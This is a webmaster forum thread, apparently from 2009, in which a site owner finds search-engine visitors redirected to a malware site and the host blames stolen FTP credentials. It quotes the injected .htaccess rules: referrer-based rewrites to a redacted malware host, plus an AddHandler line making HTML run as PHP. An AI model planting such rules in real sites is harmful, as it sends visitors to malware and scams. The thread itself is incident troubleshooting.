Forum Moderators: phranque
It's been hacked in that if you follow any links to it from Google or Yahoo search results you end up on another site that tells you that you've got a virus and prompts you to install some software to sort the problem (probably very bad malicious software!) - a standard sort of scam it seems these days (*sigh*). Actually, you don't always get to the same page - sometimes it might be a gambling site or similar.
However, my site itself does not seem to be hacked! If you navigate directly to my site it's OK. I've downloaded some of the files and they are untouched.
If you follow a link from webfetch.com it's OK! Other links to the site appear OK.
So basically ALL links to my site from two of the biggest search engines go to some malware site! GREAT!
I'm pretty sure there is nothing virus/malware related on my machine... A friend first noticed this issue when they searched Google on their machine (AVG actually blocked the webpage). I then tried this on my machine and yes - same problem.
I've tried Firefox and IE6 - both the same. My HOSTS file appears OK.
My site is about 10 years old and I've not touched it in years. No 3rd party scripts - mostly just (a lot of) static HTML and JavaScript.
So, what's happened to my links from Google and Yahoo?! Have the search engines themselves been hacked?!
Has anyone seen this sort of thing before? Has anyone any idea what's going on? I'm puzzled and a tad freaked out! Thankfully it's not a commercial site!
Any thoughts most welcome.
A couple of weeks ago, this appeared in my .htaccess file in the root of my site:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.live.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo.com.*$ [NC]
RewriteRule .* [BAD_MALWARE_SITE_HERE.com...] [R,L]
So, that explains why I'm getting redirected following links from the main search engines! Eeesh!
And also (a week ago) my index.html and links.html files (both in the webroot) have acquired an enomrous number of invisible links to unsavoury websites! Hhhmmm, I can't see any other files that have changed?!
How could this have happened - bearing in mind I have no 3rd scripts and very very little server-side script all. It's pretty much all static HTML and JavaScript.
May be time to change my webhost?!
One thing they don't cover is the use of popular blog widgets to gain access to generic wordpress based sites (as well as others).
When you run a widget on your site that gathers data from an outside source you need to make sure your site does not have php enabled outside the loop.
Some blog software offers a plugin to allow php code execution sitewide and it's possible for malicious code to be loaded onto your site via the widget.
I realise now that actually, my entire .htaccess was replaced, it wasn't simply appended to. And there was an additional line at the top of the file:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
:
I have since had a reply from my webhost:
Thank you for your e-mail dated 28th of March 2009.It shows that your FTP login details have been compromised and used to amend the content of your website.
In the first instance, we would recommend changing the FTP Password via the Passwords menu of **** Control Panel.
You should then re-upload any pages which you believe have been modified.We would also strongly recommend performing a virus scan on any computers that may have stored the FTP password, including a scan for spyware / malware and RootKits that may have infected these machines and used to obtain this and other sensitive information.
:
Hhhhmmm, this sounds like one of those standard replies to me!? I'm pretty sure (well, as sure as I can be) that my FTP details haven't been compromised from my end! And now, all of a sudden, when I log into my control panel I get the message:
We are aware that some of our customers on our **** platform may be experiencing some FTP connectivity issues.We have performed security updates on the platform that have resulted in some FTP passwords no longer being synchronised to the server.
To resolve this please follow the steps below:
- Login to ****
- Click the passwords link on the left hand side of the page.
- Change the system password to a new unique password for added security.This will then re-synchronise your ftp password to your control panel password.
:
Ahhh... an admission of guilt? This sounds like their end to me?!
